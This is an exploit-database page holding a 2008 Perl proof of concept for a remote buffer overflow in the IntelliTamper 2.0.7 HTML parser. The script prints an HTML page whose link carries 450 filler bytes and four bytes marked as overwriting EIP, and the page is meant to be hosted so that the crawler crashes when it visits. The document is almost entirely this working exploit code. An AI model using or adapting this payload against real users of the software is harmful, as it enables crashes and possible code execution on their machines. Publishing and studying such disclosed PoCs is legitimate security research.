IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC
# Published : 2008-07-21
# Author : Guido Landi
# Previous Title : minix 3.1.2a tty panic Local Denial of Service Vulnerability
# Next Title : MS Internet Explorer GDI+ Proof of Concept (MS08-052)

#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.

use warnings;
use strict;

my $evil_html   =       '<html><head><title>ph33r</title></head><body>' .
                        '<a href="http://google.it/' .
                        "x41" x 450 .
                        "x42" x 4 . # EIP
                        '.htm">ph33r</a>' .
                        "</body></html>";

print $evil_html;

# www.Syue.com [2008-07-21]